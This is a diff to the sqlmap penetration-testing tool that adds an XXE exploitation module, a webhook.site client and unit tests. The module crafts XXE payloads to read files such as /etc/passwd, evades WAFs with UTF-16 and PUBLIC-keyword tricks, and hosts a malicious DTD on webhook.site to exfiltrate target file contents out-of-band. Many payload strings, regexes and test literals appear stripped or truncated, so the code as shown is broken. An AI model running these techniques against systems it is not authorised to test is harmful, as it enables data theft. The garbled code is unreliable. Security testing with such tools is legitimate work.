"""Thin webhook.site client: mints tokens (optionally serving fixed content) + and reads back the requests captured on them. All calls go through sqlmap's + request stack (proxy/timeout honoured) straight to the service, not the target.""" + + def __init__(self): + # Exfil host is the public content-serving endpoint (its token API is + # service-specific, so --oob-server, which selects the interactsh *detection* + # server, deliberately does not repoint it). + self.endpoint = OOB_EXFIL_ENDPOINT.rstrip('/') + + def _api(self, path, post=None): + try: + headers = {HTTP_HEADER.CONTENT_TYPE: "application/json"} if post is not None else {HTTP_HEADER.ACCEPT: "application/json"} + page, _, code = Request.getPage(url="%s%s" % (self.endpoint, path), post=post, + auxHeaders=headers, direct=True, silent=True, raise404=False) + return page if (code is None or code in (200, 201)) else None + except Exception as ex: + logger.debug("webhook.site request to '%s' failed: %s" % (path, getText(ex))) + return None + + def newToken(self, content=None): + """Create a token. When `content` is given the token serves it verbatim + (used to host the external DTD). Returns the token UUID or None.""" + body = {"default_status": 200} + if content is not None: + body["default_content"] = content + body["default_content_type"] = "application/xml" + page = self._api("/token", post=json.dumps(body)) + if page: + try: + return json.loads(page).get("uuid") + except ValueError: + pass + return None + + def hostUrl(self, token): + """Target-facing URL for a token. Plain HTTP - XML parsers (libxml) commonly + cannot fetch https external entities.""" + host = self.endpoint.split("://", 1)[-1] + return "http://%s/%s" % (host, token) + + def captured(self, token): + """Return the list of request records captured on `token` (newest first).""" + page = self._api("/token/%s/requests?sorting=newest&per_page=50" % token) + if page: + try: + return json.loads(page).get("data") or [] + except ValueError: + pass + return [] diff --git a/lib/techniques/xxe/__init__.py b/lib/techniques/xxe/__init__.py new file mode 100644 index 000000000..bcac84163 --- /dev/null +++ b/lib/techniques/xxe/__init__.py @@ -0,0 +1,8 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +pass diff --git a/lib/techniques/xxe/inject.py b/lib/techniques/xxe/inject.py new file mode 100644 index 000000000..0a585c4d7 --- /dev/null +++ b/lib/techniques/xxe/inject.py @@ -0,0 +1,699 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import re +import time + +from lib.core.common import beep +from lib.core.common import dataToOutFile +from lib.core.common import randomStr +from lib.core.common import singleTimeWarnMessage +from lib.core.convert import getBytes +from lib.core.convert import getText +from lib.core.convert import getUnicode +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.dicts import POST_HINT_CONTENT_TYPES +from lib.core.enums import CUSTOM_LOGGING +from lib.core.enums import HTTP_HEADER +from lib.core.settings import ASTERISK_MARKER +from lib.core.settings import XXE_BLACKHOLE_HOST +from lib.core.settings import XXE_ERROR_SIGNATURES +from lib.core.settings import XXE_HARDENED_REGEX +from lib.core.settings import XXE_IMPACT_FILES +from lib.core.settings import OOB_EXFIL_DEFAULT_FILE +from lib.core.settings import OOB_POLL_ATTEMPTS +from lib.core.settings import OOB_POLL_DELAY +from lib.core.settings import XXE_LOCAL_DTDS +from lib.core.settings import XXE_TIME_THRESHOLD +from lib.request.connect import Connect as Request + +# Fresh per-scan sentinel token. Deliberately a random opaque string (never +# root:x:0:0 or similar) so it cannot collide with a WAF honeypot signature and +# so its presence in a response is unambiguously our reflected/expanded value. +SENTINEL = randomStr(length=12, lowercase=True) + +# First element of the document (skipping the prolog, comments and any +# DOCTYPE). Its name must match the DOCTYPE name or libxml2/Xerces reject the doc. +_ROOT_RE = re.compile(r"<\s*([A-Za-z_][\w.\-]*(?::[\w.\-]+)?)") + +# A leaf text node: >text< with no markup/entities inside. Used to place an +# entity reference where the application is most likely to echo it back. +_TEXTNODE_RE = re.compile(r">(\s*[^<>&\s][^<>&]*)<") + + +def _looksXml(data): + data = (getText(data) or "").strip() + return data.startswith("<") and re.search(r"<[A-Za-z_?!]", data) is not None and '>' in data + + +def _cleanBody(): + """Return the original request body with sqlmap's injection marks removed. + Order matters: drop the injected custom marks first (any literal '*' from the + original body was already escaped to ASTERISK_MARKER by target processing), + then restore those escaped asterisks.""" + data = getText(conf.data or "") + data = data.replace(kb.customInjectionMark or "\x00", "") + data = data.replace(ASTERISK_MARKER, "*") + return data.lstrip(u"\ufeff\ufffe") # drop a leading BOM so root/DOCTYPE handling stays correct + + +def _rootName(xml): + stripped = re.sub(r"<\?.*?\?>", "", xml, flags=re.DOTALL) + stripped = re.sub(r"", "", stripped, flags=re.DOTALL) + stripped = re.sub(r"]*(?:\[[^\]]*\])?\s*>", "", stripped, flags=re.DOTALL) + match = _ROOT_RE.search(stripped) + return match.group(1) if match else None + + +def _auxHeaders(): + """Send an XML content-type unless the user already pinned one (via -H/-r).""" + for name, _ in (conf.httpHeaders or []): + if (name or "").lower() == HTTP_HEADER.CONTENT_TYPE.lower(): + return None + return {HTTP_HEADER.CONTENT_TYPE: POST_HINT_CONTENT_TYPES.get(kb.postHint) or "application/xml"} + + +def _send(body): + """Issue one request with a fully-crafted XML body, preserving sqlmap's normal + request machinery (URL, cookies, headers, proxy, delay) for everything else.""" + + if conf.delay: + time.sleep(conf.delay) + + try: + if conf.verbose >= 3: + logger.log(CUSTOM_LOGGING.PAYLOAD, getUnicode(body)) + page, _, _ = Request.getPage(post=body, method=conf.method, auxHeaders=_auxHeaders(), raise404=False, silent=True) + return page or "" + except Exception as ex: + logger.debug("XXE probe request failed: %s" % getUnicode(ex)) + return "" + + +def _buildDoctype(xml, rootName, internalSubset): + """Prepend (or extend) a DOCTYPE carrying `internalSubset` into `xml`. + A document may already declare a DOCTYPE - injecting a second one is invalid + XML and every parser rejects it, so we splice into the existing declaration + instead (into its internal subset, or by adding one to a subset-less DOCTYPE).""" + + existing = re.search(r"\[]*\[", xml) + if existing: + # Splice our declarations into the existing internal subset. + insertAt = xml.index('[', existing.start()) + 1 + return xml[:insertAt] + "\n" + internalSubset + "\n" + xml[insertAt:] + + subsetless = re.search(r"\[]*>", xml) + if subsetless: + # DOCTYPE with an external id but no internal subset (e.g. SYSTEM "x.dtd"): + # add an internal subset before its closing '>' (both may legally coexist). + close = xml.index('>', subsetless.start()) + return xml[:close] + " [\n" + internalSubset + "\n]" + xml[close:] + + doctype = "" % (rootName, internalSubset) + prolog = re.match(r"\s*<\?xml.*?\?>", xml, flags=re.DOTALL) + if prolog: + end = prolog.end() + return xml[:end] + "\n" + doctype + xml[end:] + return doctype + "\n" + xml + + +def _placeRef(xml, snippet, attrs=False): + """Insert `snippet` (an entity reference or an XInclude element) into EVERY leaf + text node - not just the first - so detection does not depend on which field the + application happens to reflect. When `attrs` is set (internal-entity tier only), + also seed existing attribute values, since a general internal entity legally + expands inside an attribute (external entity refs do NOT - never seed attributes + for the external/XInclude tiers or the document becomes ill-formed). Falls back to + injecting just before the root's closing tag when there is no text node at all.""" + + start = re.search(r"\]>", xml).end() if "]>" in xml else 0 + head, tail = xml[:start], xml[start:] + tail, count = _TEXTNODE_RE.subn(lambda _: ">" + snippet + "<", tail) + if attrs: + # Seed every attribute value except namespace declarations (xmlns / xmlns:*), + # whose rewriting would break the document. Only touches simple, entity-free + # values (the '[^"\'<>&]*' class) so we never corrupt existing markup. + tail, acount = re.subn(r'''(\s(?!xmlns[:=])[\w.:-]+\s*=\s*)("|')[^"'<>&]*\2''', + lambda m: "%s%s%s%s" % (m.group(1), m.group(2), snippet, m.group(2)), tail) + count += acount + if count: + return head + tail + + rootName = _rootName(xml) + if rootName: + close = "" % rootName + if close in xml: + idx = xml.rindex(close) + return xml[:idx] + snippet + xml[idx:] + # self-closing root: -> snippet + selfClose = re.search(r"<%s\b[^>]*/>" % re.escape(rootName), xml) + if selfClose: + tag = selfClose.group(0) + opened = tag[:-2] + ">" + snippet + close + return xml[:selfClose.start()] + opened + xml[selfClose.end():] + return xml + + +def _fingerprint(page): + page = getUnicode(page or "") + for family, regex in XXE_ERROR_SIGNATURES: + if re.search(regex, page): + return family + return None + + +def _echoed(page): + """True when the response mirrors our raw markup back. Essential guard for the + sentinel-in-path oracles: a debug/echo endpoint that never parses XML would + otherwise reflect the sentinel (it is inside the body we sent) and look like a + genuine parser error. A real error surfaces only the path/message, not the + DOCTYPE/entity declarations.""" + page = getUnicode(page or "") + return "' % (ent, SENTINEL) + payload = _placeRef(_buildDoctype(xml, rootName, subset), "&%s;" % ent, attrs=True) + page = _send(payload) + + if SENTINEL in page and ("&%s;" % ent) not in page and not _echoed(page) and SENTINEL not in baseline: + return payload, page + return None, page + + +def _confirmRead(page, pattern, baseline): + """Return the first response line that matches a known file-content signature + and is absent from the baseline. The baseline guard is essential: it stops a + generic short reply (e.g. 'received', 'ok') from matching a loose pattern.""" + + baselineLines = set(_.strip() for _ in getUnicode(baseline or "").splitlines()) + for line in getUnicode(page).splitlines(): + line = line.strip() + if line and line not in baselineLines and re.search(pattern, line): + return line + return None + + +def _tryInbandFileRead(xml, rootName, fileName): + """Read an arbitrary file IN-BAND on a reflective target: place the external + entity between two random markers so the exact file content can be sliced out + of the response regardless of surrounding template. Raw file:// works for text + files; php://filter base64 (PHP) carries files with XML-special bytes. Returns + the file content or None.""" + + from lib.core.convert import decodeBase64 + + resource = fileName if fileName.startswith("/") else "/" + fileName + m1, m2 = randomStr(8, lowercase=True), randomStr(8, lowercase=True) + for systemId, isB64 in (("file://%s" % resource, False), + ("php://filter/convert.base64-encode/resource=%s" % resource, True)): + ent = randomStr(8, lowercase=True) + subset = '' % (ent, systemId) + payload = _placeRef(_buildDoctype(xml, rootName, subset), "%s&%s;%s" % (m1, ent, m2)) + page = getUnicode(_send(payload)) + match = re.search(re.escape(m1) + r"(.*?)" + re.escape(m2), page, re.DOTALL) + if not match: + continue + data = match.group(1) + if not data.strip() or ("&%s;" % ent) in data: # empty read or un-expanded echo + continue + if isB64: + try: + data = getText(decodeBase64(data.strip())) + except Exception: + continue + if data and data.strip(): + return data + return None + + +def _tryExternalFile(xml, rootName, baseline): + """Impact demonstration once XXE is live: read a benign host-identity file via + an external general entity. Returns (systemId, snippet) on a confirmed read.""" + + for systemId, pattern in XXE_IMPACT_FILES: + ent = randomStr(length=8, lowercase=True) + subset = '' % (ent, systemId) + payload = _placeRef(_buildDoctype(xml, rootName, subset), "&%s;" % ent) + snippet = _confirmRead(_send(payload), pattern, baseline) + if snippet: + return systemId, snippet + return None, None + + +def _tryPhpFilter(xml, rootName, baseline): + """PHP-only in-band read that survives newlines/binary: base64 a source file + through php://filter. Confirmed when the reflection decodes to file content.""" + + from lib.core.convert import decodeBase64 + + baselineTokens = set(re.findall(r"[A-Za-z0-9+/]{16,}={0,2}", getUnicode(baseline or ""))) + for systemId, pattern in (("file:///etc/passwd", r":0:0:"), ("file:///etc/os-release", r"(?i)^(?:NAME|ID|VERSION)=")): + resource = systemId[len("file://"):] + ent = randomStr(length=8, lowercase=True) + subset = '' % (ent, resource) + payload = _placeRef(_buildDoctype(xml, rootName, subset), "&%s;" % ent) + page = _send(payload) + for token in re.findall(r"[A-Za-z0-9+/]{16,}={0,2}", getUnicode(page)): + if token in baselineTokens: + continue + try: + decoded = getText(decodeBase64(token)) + except Exception: + continue + if decoded and re.search(pattern, decoded, re.M): + return payload + return None + + +def _tryError(xml, rootName): + """T3 error-based: a parameter entity points at a non-existent path carrying + the sentinel. Confirmed when the sentinel surfaces inside a parser error.""" + + subset = '\n%%xxe;' % SENTINEL + payload = _buildDoctype(xml, rootName, subset) + page = _send(payload) + if SENTINEL in page and not _echoed(page): + return payload, page + return None, page + + +def _tryLocalDtd(xml, rootName): + """T3b no-egress error-based: repurpose an on-disk DTD, redefine one of its + parameter entities to load a sentinel path, and read the sentinel back out of + the resulting parser error - no outbound network required.""" + + for dtdPath, entName in XXE_LOCAL_DTDS: + subset = ( + '\n' + "%xxe;'>\n" + "%%local_dtd;" + ) % (dtdPath, entName, SENTINEL) + payload = _buildDoctype(xml, rootName, subset) + page = _send(payload) + if SENTINEL in page and not _echoed(page): + return payload, page + return None, "" + + +def _tryErrorExfil(xml, rootName): + """In-band error-based file EXFILTRATION: coerce the parser into an error whose + message embeds the target file's contents (not just a sentinel). Two vehicles: + (a) repurpose a local on-disk DTD -> NO egress at all, or (b) a DTD we host on + the exfil service -> needs egress to fetch it plus verbose errors. php://filter + base64 carries a whole multi-line file intact; raw file:// leaks the first line + on any parser. Returns (content, filename) or (None, None).""" + + from lib.core.convert import decodeBase64 + + fileName = conf.get("fileRead") or OOB_EXFIL_DEFAULT_FILE + resource = fileName if fileName.startswith("/") else "/" + fileName + marker = randomStr(10, lowercase=True) + # (systemId, isBase64): base64 first (whole file, PHP), raw fallback (first line, any parser) + reads = (("php://filter/convert.base64-encode/resource=%s" % resource, True), + ("file://%s" % resource, False)) + + def _extract(page, isB64): + pattern = (r"file:/+%s/([A-Za-z0-9+/=]+)" if isB64 else r"file:/+%s/([^\s'\"<>;)]+)") % re.escape(marker) + match = re.search(pattern, getUnicode(page)) + if not match: + return None + if isB64: + try: + return getText(decodeBase64(match.group(1))) or None + except Exception: + return None + return match.group(1) + + # (a) local-DTD repurposing - no egress + for dtdPath, entName in XXE_LOCAL_DTDS: + for systemId, isB64 in reads: + inner = ('' + '">' + '%eval;%error;') % (systemId, marker) + subset = '\n\n%%local_dtd;' % (dtdPath, entName, inner) + content = _extract(_send(_buildDoctype(xml, rootName, subset)), isB64) + if content: + return content, fileName + + # (b) DTD we host on the exfil service - egress + verbose errors (third party) + if not _oobEnabled(): + return None, None + from lib.request.webhooksite import WebhookSite + wh = WebhookSite() + for systemId, isB64 in reads: + dtd = ('\n' + '">\n' + '%%eval;\n%%error;') % (systemId, marker) + token = wh.newToken(dtd) + if not token: + break + content = _extract(_send(_buildDoctype(xml, rootName, ' %%dtd;' % wh.hostUrl(token))), isB64) + if content: + return content, fileName + + return None, None + + +def _tryXInclude(xml, rootName, baseline): + """T4 fallback when DOCTYPE/entities are unavailable: XInclude a benign file as + text. Confirmed when the file content appears in the response (baseline-guarded).""" + + for systemId, pattern in XXE_IMPACT_FILES: + snippet = '' % systemId + payload = _placeRef(xml, snippet) + confirmed = _confirmRead(_send(payload), pattern, baseline) + if confirmed: + return payload, systemId, confirmed + return None, None, None + + +def _tryEvasions(xml, rootName, baseline): + """T5 WAF-evasion fallbacks, tried only when the straightforward tiers fail. + Each transform keeps the payload semantically identical while defeating a + common naive filter, so a reachable-but-filtered parser can still be caught. + Returns (title, payload) on a confirmed hit.""" + + # (1) UTF-16 re-encoding: libxml2/Xerces honor the BOM-declared encoding while + # ASCII byte-signature WAFs (grepping for "' % (ent, SENTINEL) + body = _placeRef(_buildDoctype(xml, rootName, subset), "&%s;" % ent) + page = _send(getText(body).encode("utf-16")) # BOM-prefixed UTF-16, py2/py3 alike + if SENTINEL in page and not _echoed(page) and SENTINEL not in baseline: + return "In-band via UTF-16 re-encoding (WAF evasion)", getUnicode(body) + + # (2) PUBLIC keyword instead of SYSTEM: bypasses filters that only blocklist + # the SYSTEM identifier; the second literal is still the resolved system id. + subset = '\n%%xxe;' % SENTINEL + body = _buildDoctype(xml, rootName, subset) + page = _send(body) + if SENTINEL in page and not _echoed(page): + return "Error-based via PUBLIC keyword (WAF evasion)", body + + return None, None + + +def _timed(body, timeout): + """One request, returning wall-clock seconds. ignoreTimeout keeps a stalled + parser from raising, so the elapsed time itself is the signal.""" + start = time.time() + try: + Request.getPage(post=body, method=conf.method, auxHeaders=_auxHeaders(), + raise404=False, silent=True, ignoreTimeout=True, timeout=timeout) + except Exception: + pass + return time.time() - start + + +def _tryTimeBlind(xml, rootName): + """T6 last-resort blind detection with NO collector: an external parameter + entity aimed at a non-routable TEST-NET host stalls a fetching parser on the + connection. Confirmed only on a large, reproducible delay measured against a + DTD-processing control (an internal parameter entity, no fetch) - so DTD + overhead alone cannot trip it and only the outbound-fetch stall counts.""" + + control = _buildDoctype(xml, rootName, '\n%%c;') + baseline = max(_timed(control, conf.timeout), _timed(control, conf.timeout)) + threshold = baseline + XXE_TIME_THRESHOLD + probeTimeout = min(conf.timeout, int(baseline) + XXE_TIME_THRESHOLD + 3) + + # Bound each stalled probe: the per-call timeout kwarg does not reach a pooled + # socket, so cap via conf.timeout (the value the connection actually uses) and + # drop conf.retries so a stall is not re-sent. Restored in finally. + _timeout, _retries = conf.timeout, conf.retries + conf.timeout, conf.retries = probeTimeout, 0 + try: + subset = '\n%%x;' % (XXE_BLACKHOLE_HOST, SENTINEL) + payload = _buildDoctype(xml, rootName, subset) + + if _timed(payload, probeTimeout) < threshold: + return None + if _timed(payload, probeTimeout) < threshold: # must reproduce + return None + return payload + finally: + conf.timeout, conf.retries = _timeout, _retries + + +def _oobEnabled(): + """Out-of-band tiers contact a public third party by default. Honour an explicit + opt-out (`--oob-server none`) for sensitive engagements.""" + return (conf.get("oobServer") or "").strip().lower() not in ("none", "off", "0", "no", "disable", "false") + + +def _tryOobExfil(xml, rootName): + """T7 out-of-band EXFILTRATION for blind XXE: host a malicious external DTD on + a public content+logging service (webhook.site), point the target's parser at + it, and read the file it ships back out. The DTD uses the classic nested + parameter-entity chain (only valid in an EXTERNAL DTD) and php://filter base64 + so any file survives the callback URL. The DTD-fetch itself doubles as blind + detection. Reads conf.fileRead if given, else a benign default. Returns a dict + {payload, filename, content, detected} or None if the service is unusable.""" + + from lib.core.convert import decodeBase64 + from lib.request.webhooksite import WebhookSite + + wh = WebhookSite() + exfilToken = wh.newToken() + if not exfilToken: + logger.debug("out-of-band exfiltration tier skipped (could not reach the exfil service)") + return None + + target = conf.get("fileRead") or OOB_EXFIL_DEFAULT_FILE + exfilUrl = "%s/?x=%%file;" % wh.hostUrl(exfilToken) + dtd = ('\n' + '">\n' + '%%eval;\n%%exfil;') % (target, exfilUrl) + dtdToken = wh.newToken(dtd) + if not dtdToken: + return None + + singleTimeWarnMessage("using public out-of-band exfiltration service '%s' for blind XXE" % wh.endpoint) + payload = _buildDoctype(xml, rootName, ' %%dtd;' % wh.hostUrl(dtdToken)) + _send(payload) + + content, detected = None, False + for _ in range(OOB_POLL_ATTEMPTS): + time.sleep(OOB_POLL_DELAY) + for record in wh.captured(exfilToken): + leaked = (record.get("query") or {}).get("x") + if leaked: + try: + content = getText(decodeBase64(leaked)) + except Exception: + content = getText(leaked) + break + if content: + break + if not detected and wh.captured(dtdToken): + detected = True # the target fetched our DTD -> blind XXE confirmed even without exfil + + if not detected: + detected = bool(wh.captured(dtdToken)) + return {"payload": payload, "filename": target, "content": content, "detected": detected} + + +def _tryOob(xml, rootName): + """T7 blind confirmation via an out-of-band collector (interactsh): an external + parameter entity points at a unique callback URL. If the target's parser fetches + it (or even just resolves its DNS), the collector records the interaction and we + poll it back - definitive proof of blind XXE with egress, and it names the + channel (HTTP vs DNS-only). Returns (payload, protocol) or None.""" + + from lib.request.interactsh import Interactsh, hasCrypto + + if not hasCrypto(): + logger.debug("out-of-band blind XXE tier skipped (optional 'pycryptodome' not installed)") + return None + + client = Interactsh(server=conf.get("oobServer")) + if not client.registered: + logger.debug("out-of-band blind XXE tier skipped (could not register with an interaction server)") + return None + + singleTimeWarnMessage("using out-of-band interaction server '%s' for blind XXE confirmation (override with '--oob-server')" % client.server) + try: + url = client.url() + subset = '\n%%oob;' % url + payload = _buildDoctype(xml, rootName, subset) + _send(payload) + interactions = client.pollUntil(OOB_POLL_ATTEMPTS, OOB_POLL_DELAY) + if interactions: + protocols = sorted(set((_.get("protocol") or "?").upper() for _ in interactions)) + return payload, ", ".join(protocols) + finally: + client.close() + return None + + +def xxeScan(): + global SENTINEL + SENTINEL = randomStr(length=12, lowercase=True) + + debugMsg = "'--xxe' is self-contained: it detects XML External Entity injection " + debugMsg += "in the request body and demonstrates file-read impact. SQL enumeration " + debugMsg += "switches (--banner, --dbs, --tables, --dump) are ignored" + logger.debug(debugMsg) + + xml = _cleanBody() + if not _looksXml(xml): + logger.error("no XML body found to test (provide an XML request body via '--data' or '-r')") + return + + rootName = _rootName(xml) + if not rootName: + logger.error("could not locate the document root element in the XML body") + return + + logger.info("testing XXE injection on the XML request body (root element: '%s')" % rootName) + + baseline = _send(xml) + found = False + + # T2: in-band reflected (internal entity expansion) - the strongest oracle + payload, page = _tryInternal(xml, rootName, baseline) + if payload: + found = True + logger.info("the XML body is vulnerable to XXE injection (in-band, entity expansion enabled)") + _report("In-band (reflected internal entity)", payload) + + if conf.get("fileRead"): + content = _tryInbandFileRead(xml, rootName, conf.fileRead) + if content: + logger.info("in-band file read of '%s' succeeded" % conf.fileRead) + _report("In-band file read ('%s')" % conf.fileRead, "" % conf.fileRead) + _dumpFileRead(conf.fileRead, content) + + systemId, snippet = _tryExternalFile(xml, rootName, baseline) + if systemId: + logger.info("file-read impact confirmed via external entity ('%s'): '%s'" % (systemId, snippet)) + _report("Out-of-band file read (external entity '%s')" % systemId, " -> %s" % (systemId, snippet)) + else: + phpPayload = _tryPhpFilter(xml, rootName, baseline) + if phpPayload: + logger.info("file-read impact confirmed via php://filter (base64 source disclosure)") + _report("File read via php://filter (base64)", phpPayload) + + # T3: error-based (works where entities are not reflected but errors leak) + errorChannel = False + if not found: + payload, page = _tryError(xml, rootName) + if payload: + found = errorChannel = True + backend = _fingerprint(page) or "Generic XML" + logger.info("the XML body is vulnerable to XXE injection (error-based, back-end parser: '%s')" % backend) + _report("Error-based (parameter entity, back-end: '%s')" % backend, payload) + + # T3b: no-egress error-based via local-DTD repurposing + if not found: + payload, page = _tryLocalDtd(xml, rootName) + if payload: + found = errorChannel = True + backend = _fingerprint(page) or "Generic XML" + logger.info("the XML body is vulnerable to XXE injection (error-based via local-DTD repurposing, no egress required)") + _report("Error-based (local-DTD repurposing, back-end: '%s')" % backend, payload) + + # T3c: error-based FILE EXFILTRATION - upgrade a confirmed error channel to an + # in-band file read (or attempt it directly when the user asked via --file-read) + if errorChannel or conf.get("fileRead"): + content, fileName = _tryErrorExfil(xml, rootName) + if content: + found = True + logger.info("the XML body is vulnerable to XXE injection (error-based in-band file read of '%s')" % fileName) + _report("Error-based in-band file read ('%s')" % fileName, "" % fileName) + _dumpFileRead(fileName, content) + + # T4: XInclude fallback (no DOCTYPE/entity control needed) + if not found: + payload, systemId, snippet = _tryXInclude(xml, rootName, baseline) + if payload: + found = True + logger.info("the XML body is vulnerable to XInclude file read ('%s'): '%s'" % (systemId, snippet)) + _report("XInclude file read ('%s')" % systemId, payload) + + # T5: WAF-evasion fallbacks (UTF-16 re-encoding, PUBLIC-for-SYSTEM) + if not found: + title, payload = _tryEvasions(xml, rootName, baseline) + if title: + found = True + logger.info("the XML body is vulnerable to XXE injection (%s)" % title.lower()) + _report(title, payload) + + # T6: time-based blind (no collector, no third party) - external entity to a non-routable host + if not found: + logger.debug("attempting time-based blind XXE (external entity to a non-routable host); this can be slow") + payload = _tryTimeBlind(xml, rootName) + if payload: + found = True + logger.info("the XML body is vulnerable to XXE injection (time-based blind, external entity resolution reaches out-of-band)") + _report("Time-based blind (external entity to non-routable host)", payload) + + # T7: out-of-band exfiltration via a hosted malicious DTD (also confirms blind XXE) + if not found and _oobEnabled(): + exfil = _tryOobExfil(xml, rootName) + if exfil and (exfil["content"] or exfil["detected"]): + found = True + if exfil["content"]: + logger.info("the XML body is vulnerable to blind XXE injection (out-of-band file read of '%s')" % exfil["filename"]) + _report("Out-of-band blind file read ('%s')" % exfil["filename"], exfil["payload"]) + _dumpFileRead(exfil["filename"], exfil["content"]) + else: + logger.info("the XML body is vulnerable to blind XXE injection (out-of-band, target fetched the hosted DTD)") + _report("Out-of-band blind (hosted-DTD callback)", exfil["payload"]) + + # T8: out-of-band blind confirmation via an interaction server (DNS+HTTP callback) + if not found and _oobEnabled(): + result = _tryOob(xml, rootName) + if result: + payload, protocol = result + found = True + logger.info("the XML body is vulnerable to XXE injection (out-of-band, confirmed via %s interaction with the collector)" % protocol) + _report("Out-of-band blind (collector callback: %s)" % protocol, payload) + + if not found: + # Reachable-but-not-exploitable diagnostics: distinguish a hardened parser + # from a merely non-reflecting one so the user knows why it did not fire. + probe = _send(_buildDoctype(xml, rootName, '%%p;' % SENTINEL)) + if re.search(XXE_HARDENED_REGEX, getUnicode(probe)): + logger.info("the XML parser is reachable but appears hardened against XXE (DTD/external entities refused)") + else: + backend = _fingerprint(probe) + if backend: + logger.info("the XML body reaches a parser (back-end: '%s') but no XXE oracle could be established" % backend) + logger.warning("the XML body does not appear to be injectable via XXE") + return + + logger.info("XXE scan complete") diff --git a/tests/test_dns_server.py b/tests/test_dns_server.py index 613518b7a..234781297 100644 --- a/tests/test_dns_server.py +++ b/tests/test_dns_server.py @@ -23,7 +23,7 @@ sys.path.insert(0, os.path.dirname(os.path.abspath(__file__))) sys.path.insert(0, os.path.join(os.path.dirname(os.path.abspath(__file__)), "..")) from lib.core.settings import MAX_DNS_REQUESTS -from lib.request.dns import DNSQuery, DNSServer +from lib.request.dns import DNSQuery, DNSServer, InteractshDNSServer def build_query(name, tid=b"\x12\x34", qtype=1): @@ -324,3 +324,41 @@ class TestDNSServerConcurrency(unittest.TestCase): if __name__ == "__main__": unittest.main(verbosity=2) + + +class TestInteractshDNSServer(unittest.TestCase): + """The interactsh-backed DNS collector must present the same pop(prefix, suffix) + accounting as DNSServer, matching only prefix..suffix names and never + returning the same captured lookup twice.""" + + def _collector(self, names): + class _FakeClient(object): + registered = True + def dnsDomain(self): return "corr0000000000000nnc.oast.fun" + def dnsNames(self): return list(names) + srv = InteractshDNSServer.__new__(InteractshDNSServer) + srv._client = _FakeClient() + srv.domain = srv._client.dnsDomain() + srv._seen = set() + srv._running = True + srv._initialized = True + return srv + + def test_pop_matches_prefix_suffix_and_dedups(self): + names = ["aaa.5345435245540a.zzz.corr0000000000000nnc", "unrelated.corr0000000000000nnc"] + srv = self._collector(names) + got = srv.pop("aaa", "zzz") + self.assertEqual(got, "aaa.5345435245540a.zzz.corr0000000000000nnc") + self.assertIsNone(srv.pop("aaa", "zzz")) # already consumed + + def test_pop_no_match(self): + srv = self._collector(["aaa.deadbeef.qqq.corr0000000000000nnc"]) + self.assertIsNone(srv.pop("aaa", "zzz")) + + def test_pop_any(self): + srv = self._collector(["whatever.corr0000000000000nnc"]) + self.assertEqual(srv.pop(), "whatever.corr0000000000000nnc") + + def test_run_is_noop(self): + self._collector([]).run() # must not raise + diff --git a/tests/test_xxe.py b/tests/test_xxe.py new file mode 100644 index 000000000..0c29c0585 --- /dev/null +++ b/tests/test_xxe.py @@ -0,0 +1,236 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission + +Offline, deterministic tests for the XXE injection engine. Pure helpers are exercised +directly; detection tiers run against a mocked _send() so reflected/error/echo oracles +can be simulated without a live target; and crafted payloads are parsed with real lxml +to prove they are well-formed and actually expand the injected entity. +""" + +import os +import re +import sys +import unittest + +sys.path.insert(0, os.path.dirname(os.path.abspath(__file__))) +from _testutils import bootstrap +bootstrap() + +import lib.techniques.xxe.inject as xxe +from lib.core.data import conf +from lib.core.data import kb + + +class TestLooksXmlAndClean(unittest.TestCase): + def test_looks_xml(self): + self.assertTrue(xxe._looksXml("x")) + self.assertTrue(xxe._looksXml(" ")) + self.assertFalse(xxe._looksXml("id=1&name=x")) + self.assertFalse(xxe._looksXml("{\"a\": 1}")) + self.assertFalse(xxe._looksXml("")) + + def test_clean_body_strips_marks_and_bom(self): + conf.data = u"\ufeffluther%s" % (kb.customInjectionMark or "*") + cleaned = xxe._cleanBody() + self.assertFalse(cleaned.startswith(u"\ufeff")) + self.assertNotIn(kb.customInjectionMark or "*", cleaned) + self.assertTrue(cleaned.startswith("")) + + +class TestRootName(unittest.TestCase): + def test_plain(self): + self.assertEqual(xxe._rootName("x"), "user") + + def test_with_prolog_and_comment(self): + self.assertEqual(xxe._rootName("x"), "order") + + def test_namespaced(self): + self.assertEqual(xxe._rootName(''), "soap:Envelope") + + def test_existing_doctype_skipped(self): + self.assertEqual(xxe._rootName(''), "user") + + +class TestBuildDoctype(unittest.TestCase): + SUBSET = '' + + def test_no_doctype_prepended(self): + out = xxe._buildDoctype("x", "r", self.SUBSET) + self.assertIn("x", "r", self.SUBSET) + self.assertLess(out.index("]>x", "r", self.SUBSET) + self.assertEqual(out.count("x', "r", self.SUBSET) + self.assertEqual(out.count("onetwo

", "&e;") + self.assertEqual(out.count("&e;"), 2) + self.assertNotIn("one", out) + self.assertNotIn("two", out) + + def test_attributes_only_when_requested(self): + text = 'luther' + self.assertNotIn('id="&e;"', xxe._placeRef(text, "&e;")) # attrs off by default + self.assertIn('id="&e;"', xxe._placeRef(text, "&e;", attrs=True)) # attrs on + + def test_xmlns_preserved(self): + out = xxe._placeRef('x', "&e;", attrs=True) + self.assertIn('xmlns:soap="ns"', out) # namespace decl untouched + + def test_self_closing_fallback(self): + out = xxe._placeRef("", "&e;") + self.assertIn("&e;", out) + self.assertIn("", out) + + def test_empty_element_fallback(self): + out = xxe._placeRef("", "&e;") + self.assertIn("&e;", out) + + +class TestGuards(unittest.TestCase): + def test_echoed(self): + self.assertTrue(xxe._echoed("... luther", "u", baseline="Hello, luther!") + self.assertIsNotNone(payload) + + def test_internal_echo_rejected(self): + # endpoint mirrors the raw body back (never parses) -> must NOT be a hit + xxe._send = lambda body: "You sent: %s" % body + payload, _ = xxe._tryInternal("luther", "u", baseline="You sent: luther") + self.assertIsNone(payload) + + def test_internal_baseline_contains_sentinel_rejected(self): + xxe._send = lambda body: "Hello, %s!" % xxe.SENTINEL + payload, _ = xxe._tryInternal("luther", "u", baseline="already %s here" % xxe.SENTINEL) + self.assertIsNone(payload) + + def test_error_based_positive(self): + xxe._send = lambda body: 'XML error: failed to load external entity "file:///%s/nonexistent"' % xxe.SENTINEL + payload, page = xxe._tryError("x", "u") + 